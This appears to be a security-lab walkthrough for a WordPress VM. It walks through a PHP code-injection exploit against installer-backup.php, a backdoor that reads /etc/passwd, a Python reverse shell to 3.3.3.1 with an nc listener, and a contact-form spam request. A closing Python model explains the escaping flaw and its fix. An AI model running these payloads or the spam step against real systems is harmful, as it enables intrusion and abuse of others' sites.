1. Scan

   nmap -sV 3.3.3.3 -oN nmap_scan.txt
   wpscan --url http://3.3.3.3 -e ap --plugins-version-all --plugins-detection aggressive

2. Perform a manual backup of wp-config.php (the installer rewrites it in step 3, so keep a known-good copy to restore afterwards)

   From Kali or directly on Ubuntu:

   ssh osboxes@3.3.3.3
   sudo su                      (-> enter osboxes' password: ituniversity)
   cp /var/www/html/wp-config.php /var/www/html/wp-config.php.working
   chown -R www-data:www-data /var/www/html/

   The chown makes the web root writable by the web server; that is what lets the installer rewrite wp-config.php and lets the injected code drop test.php in the next step.

3. Exploit & upload -> in Burp (Repeater module): host: 3.3.3.3, port: 80

   POST /installer-backup.php HTTP/1.1
   Host: 3.3.3.3
   Content-Type: application/x-www-form-urlencoded
   Connection: close
   Content-Length: 244

   action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=test'); file_put_contents("test.php", '
   '); /*&dbport=12345&

   The dbname value closes the single-quoted string literal the installer writes into wp-config.php, appends its own PHP statement, and opens a /* comment so whatever the installer appends after it is not parsed.

   Access http://3.3.3.3/wp-config.php to apply the wp-config: loading the rewritten file executes the injected file_put_contents and creates test.php.

   Access the backdoor (non-interactive):
   http://3.3.3.3/test.php?synacktiv_backdoor=cat+/etc/passwd

   Access the backdoor (interactive mode):
   - from the Kali console, start the listener first: nc -l -p 1234
   - then request (3.3.3.1 is the Kali IP the shell connects back to):
     3.3.3.3/test.php?synacktiv_backdoor=python+-c+'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.3.3.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
     (interactive shell sent to a remote IP:port)
   - you will have a shell in the Kali terminal where you issued nc in the step above

   Other shells that you can try: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

4. Install the two WordPress plugins for the Sending Spam lab: contact-form-7.4.6.zip and wp-mail-smtp.1.4.1.zip (attached)

   Sample request - not to be used as-is, only as an example (your cookie and _wpnonce will differ; capture your own form submission in Burp and replay that):

   POST / HTTP/1.1
   Host: 3.3.3.3
   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
   Accept: application/json, text/javascript, */*; q=0.01
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Referer: http://3.3.3.3/
   Content-Type: application/x-www-form-urlencoded
   X-Requested-With: XMLHttpRequest
   Content-Length: 306
   Cookie: wp-settings-time-1=1545654147; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_872a43f973d6de2a95ce3e25fc65f95d=root%7C1546863352%7Chi3WQqkWXZgh4DKA1RwH3nc8addEgGdxa0uxitKSUqH%7C55a83caf0744b169f2ce0a09f87529880b8fd65b3f6f36fc41eeef62e8dbb857
   Connection: close

   _wpcf7=5&_wpcf7_version=4.6&_wpcf7_locale=en_US&_wpcf7_unit_tag=wpcf7-f5-p1-o1&_wpnonce=7e257efc30&your-name=iPhone+Cases+for+Sale&your-email=youremail@testemailrandom.uf&your-subject=iPhone+case+for+sale%2C+only+%249&your-message=Bla+bla+visit+this+website%3A+www.iphonecase.blablabla.com&_wpcf7_is_ajax_call=1
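Why the dbname field in the step-3 request turns into code execution, as an added example for these notes (it is not code from the lab or from the Duplicator plugin): a Python model of the installer's templating step, which copies the submitted database settings into wp-config.php as PHP single-quoted string literals, placed beside a hardened version that escapes the values first. The TEMPLATE shape, the function names and the form parser are assumptions made for the illustration, and the 'X' inside file_put_contents stands in for the PHP body the lab writes into test.php, which this page does not reproduce.

```python
"""Model of how installer-backup.php's step 3 turns the submitted DB settings
into wp-config.php, and why an unescaped dbname becomes PHP code.
Added example for the lab write-up; simplified, not Duplicator's own source."""

from urllib.parse import unquote_plus

# Assumed shape of the config lines the installer emits; the real file has
# more, but the quoting problem is the same on every interpolated line.
TEMPLATE = (
    "define('DB_NAME', '{dbname}');\n"
    "define('DB_USER', '{dbuser}');\n"
    "define('DB_PASSWORD', '{dbpass}');\n"
    "define('DB_HOST', '{dbhost}');\n"
)

DB_FIELDS = ("dbname", "dbuser", "dbpass", "dbhost")


def fields_from_body(body):
    """Split an application/x-www-form-urlencoded body into a dict, the way
    PHP populates $_POST. A hand-rolled splitter is used on purpose: older
    urllib.parse.parse_qs also splits on ';', which sits inside the payload."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def render_vulnerable(fields):
    """The bug: values are dropped into PHP string literals verbatim, so a
    value containing ' closes the literal and the rest is parsed as PHP."""
    return TEMPLATE.format(**{k: fields.get(k, "") for k in DB_FIELDS})


def php_single_quoted(value):
    """Escape for a PHP single-quoted literal: only backslash and the quote
    itself are special there, so escaping both keeps any value inert."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def render_hardened(fields):
    """Same template, but every value is escaped before interpolation."""
    return TEMPLATE.format(
        **{k: php_single_quoted(fields.get(k, "")) for k in DB_FIELDS})


# The lab's step-3 body as sent from Burp (constructed here). 'X' stands in
# for the PHP the lab writes into test.php; its text is not on the page.
LAB_BODY = (
    "action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test"
    "&dbname=test'); file_put_contents(\"test.php\", 'X'); /*"
    "&dbport=12345&"
)


def db_name_line(rendered):
    """First line of the rendered config, where DB_NAME (and the payload) lands."""
    return rendered.splitlines()[0]


if __name__ == "__main__":
    fields = fields_from_body(LAB_BODY)
    print("vulnerable:\n" + render_vulnerable(fields))
    print("hardened:\n" + render_hardened(fields))
```

In the vulnerable output the DB_NAME line reads define('DB_NAME', 'test'); file_put_contents("test.php", 'X'); /*');, i.e. a finished define() call, the attacker's statement, and a comment that swallows the trailing '); and the lines after it. In the hardened output the same bytes are still present but every quote is backslash-escaped, so PHP sees one long database name and nothing executes; the fix is escaping at the point of interpolation, not filtering the request.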